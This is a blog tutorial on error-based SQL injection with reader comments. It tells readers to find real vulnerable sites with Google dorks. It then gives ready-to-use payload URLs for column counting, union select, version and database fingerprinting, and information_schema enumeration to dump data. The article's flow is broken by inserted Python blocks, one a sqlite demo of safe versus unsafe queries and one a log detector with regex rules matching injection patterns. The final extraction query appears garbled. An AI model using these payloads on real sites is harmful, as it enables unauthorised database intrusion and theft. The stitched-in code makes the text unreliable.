Error Based SQL Injection: Best practices and projects

January 29, 2017


Hello Leaders,

Today I’m going to talk about the second part of the SQL Injection article.

First, I want to explain the purpose of Error-based SQL injection. Don’t worry, it’s very simple.

RETRIEVING DATA FROM THE DATABASE

Today, SQL injection is mostly used for bypassing a login form, gaining access to an admin panel, or retrieving data. When attempting to bypass a login form, we use BLIND SQL INJECTION. In this article, I will talk about error-based SQL injection.

As the name suggests, error-based means the whole technique is based on the errors the server returns. In this attack we send something to the server in the URL, and the server shows us an error. From that error we decide what the next step will be.

First, we have to find a website that is vulnerable to error-based SQL injection. Go to Google and type the following:

inurl:index.php?id=

inurl:gallery.php?id=

The next goal is to find out whether the page is actually talking to a database or not.

http://www.example.com/gallery.php?id=6

In order to find this, we just need to put a single quote after the id number like this:

http://www.example.com/gallery.php?id=6'

If it shows an error, and the error is a SQL syntax error, then this page is connected to a database and the website is also vulnerable.

What the single quote actually does is break the query: the syntax of the query is changed, or we could say it is turned into invalid syntax, so the database returns a SQL syntax error.

Now that we know the website is vulnerable, we just need to find the number of columns. Again we are going to inject a query to get an error. What we do is order the result by each column position in turn.

http://www.example.com/gallery.php?id=6 order by 1

http://www.example.com/gallery.php?id=6 order by 2

http://www.example.com/gallery.php?id=6 order by 3

We do this until it shows an unknown column error. If it shows the unknown column error at N, the total number of columns is N-1, because the page still showed its content for order by N-1.
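To see why the probes above produce errors, and that binding the parameter stops them, here is an added example (not from the article) that stands in for gallery.php using Python's sqlite3 module; the gallery table, its rows and the function names are constructed for this demonstration, and SQLite's error text differs from MySQL's.

```python
import sqlite3

# Constructed stand-in for the article's gallery.php back end: sqlite3 replaces
# MySQL so the example runs offline (the error text differs from MySQL's).
SCHEMA = [
    "CREATE TABLE gallery (id INTEGER, title TEXT, path TEXT)",
    "INSERT INTO gallery VALUES (6, 'sunset', '/img/6.jpg')",
    "INSERT INTO gallery VALUES (7, 'harbour', '/img/7.jpg')",
]

def fresh_db():
    conn = sqlite3.connect(":memory:")
    for stmt in SCHEMA:
        conn.execute(stmt)
    return conn

def lookup_unsafe(id_param):
    """Pastes the raw ?id= value into the SQL text, which is what makes the
    probes in the article work. Returns ("rows", [...]) or ("error", message)."""
    query = "SELECT id, title, path FROM gallery WHERE id=" + id_param
    try:
        return ("rows", fresh_db().execute(query).fetchall())
    except sqlite3.Error as exc:
        # Echoing this message to the browser is exactly what "error based"
        # injection relies on; log it server-side and show a generic page instead.
        return ("error", str(exc))

def lookup_safe(id_param):
    """Same lookup with a bound parameter: the value never becomes SQL syntax,
    and anything that is not an integer is rejected before reaching the DB."""
    if not id_param.isdigit():
        return ("rejected", "id must be an integer")
    rows = fresh_db().execute(
        "SELECT id, title, path FROM gallery WHERE id=?", (int(id_param),)
    ).fetchall()
    return ("rows", rows)

if __name__ == "__main__":
    # 6' breaks the syntax; order by 4 exceeds the three selected columns.
    for probe in ["6", "6'", "6 order by 3", "6 order by 4"]:
        print(f"unsafe {probe!r:16} -> {lookup_unsafe(probe)}")
        print(f"safe   {probe!r:16} -> {lookup_safe(probe)}")
```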

Now we are going to find out which columns are displayed on the current page, so that we can say which columns are "vulnerable". Technically they are not vulnerable; they are just the columns whose content is output on the current page.

http://www.example.com/gallery.php?id=6 union all select 1,2,3,4,N-1

This shows us which columns are displayed on the current page, because those are the only columns through which we can read the database. The page shows the column numbers. If it shows 2,4, then columns 2 and 4 are displayed on the current page. The next step is to find out the version and the database name. We do this using either 2 or 4, because they are the only columns displayed on the current page.

http://www.example.com/gallery.php?id=6 union all select 1,version(),3,4,N-1

http://www.example.com/gallery.php?id=6 union all select 1,database(),3,4,N-1

We can find other information in the same way. One thing everyone should keep in mind: the more information you have, the more powerful you will be.

If the MySQL version is more than 5.0.0, it has information_schema. information_schema is just like an index of all databases.

Now our next step is to find out all the table names. To do this, we will again inject a query.

http://www.example.com/gallery.php?id=6 union all select 1,group_concat(table_name),3,4,N-1 from information_schema.tables where table_schema=database()--

It will show all the table names whose table_schema is the current database.

Our next step is to find out all the columns. Use the MySQL CHAR() value of one of the table names: take a table name, convert it with HackBar into MySQL CHAR() form, and paste it into the query in place of mysqlchar below.

http://www.example.com/gallery.php?id=6 union all select 1,group_concat(column_name),3,4,N-1 from information_schema.columns where table_name=mysqlchar--

Now that we have the column names, the final step is to get the data, because we have the database name, the table name, and the column names. table_name must be the same table we converted to CHAR() when finding the column names.

http://www.example.com/gallery.php?id=6 union all select 1,group_concat(column_name,0x0a),3,4,N-1 from table_name

0x0a is the hex value of the line-feed character; it is appended to each value so the comma-separated output of group_concat is split onto separate lines.
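From the defender's side, the sequence described above (quote, order by, union select, information_schema) leaves a recognisable trail in the web server's access log. The following is an added example, not part of the article: the log lines, the rule names and the per-client summary are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (not from the article) replaying the
# probes the text walks through against one host, plus one normal visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Jan/2017:10:00:01 +0000] "GET /gallery.php?id=6 HTTP/1.1" 200 5120
203.0.113.7 - - [29/Jan/2017:10:00:05 +0000] "GET /gallery.php?id=6%27 HTTP/1.1" 500 312
203.0.113.7 - - [29/Jan/2017:10:00:09 +0000] "GET /gallery.php?id=6+order+by+3 HTTP/1.1" 200 5120
203.0.113.7 - - [29/Jan/2017:10:00:13 +0000] "GET /gallery.php?id=6+order+by+4 HTTP/1.1" 500 310
203.0.113.7 - - [29/Jan/2017:10:00:20 +0000] "GET /gallery.php?id=6+union+all+select+1,version(),3 HTTP/1.1" 200 5200
203.0.113.7 - - [29/Jan/2017:10:00:31 +0000] "GET /gallery.php?id=6+union+all+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 5400
198.51.100.2 - - [29/Jan/2017:10:01:00 +0000] "GET /gallery.php?id=7 HTTP/1.1" 200 4980
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# One rule per step of the procedure described in the article, applied to the
# URL-decoded request path. Rule names are constructed for this example.
RULES = [
    ("quote_probe", re.compile(r"=\d+'")),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),
    ("db_fingerprint", re.compile(r"\b(version|database)\s*\(\s*\)", re.I)),
]

def analyse_line(line):
    """Return {"ip", "status", "hits"} for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote_plus(m.group("path"))  # %27 -> ', + -> space
    hits = [name for name, rx in RULES if rx.search(path)]
    return {"ip": m.group("ip"), "status": int(m.group("status")), "hits": hits}

def summarise(log_text):
    """Aggregate hits per client IP: which stages were seen and how many 5xx
    responses the probes triggered. A client that walks several stages is far
    more interesting than a single stray syntax error."""
    per_ip = {}
    for line in log_text.splitlines():
        rec = analyse_line(line)
        if rec is None or not rec["hits"]:
            continue
        entry = per_ip.setdefault(rec["ip"], {"stages": set(), "errors": 0})
        entry["stages"].update(rec["hits"])
        if rec["status"] >= 500:
            entry["errors"] += 1
    return per_ip
```

Run against a real log, the 5xx count next to the stage list is the quickest indicator that the application is echoing database errors and needs a generic error page.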

I hope this information helps you become more knowledgeable about error-based SQL injection.

Thanks & Best Regards.

5 Comments
  1. I have a doubt, friend.
    What does abc abc mean?

    Example: http://www.facebook.com abc abc
    What will this do? Can you explain it in detail for me, bro?

  2. OR MAYBE IT HAS A .HTACCESS FILE CONFIGURATION

  3. Blind or Boolean SQL injection can be correlated.

  4. What if it shows the unknown column error on order by 1 itself? Then we cannot do N-1. How do we proceed in such a case?
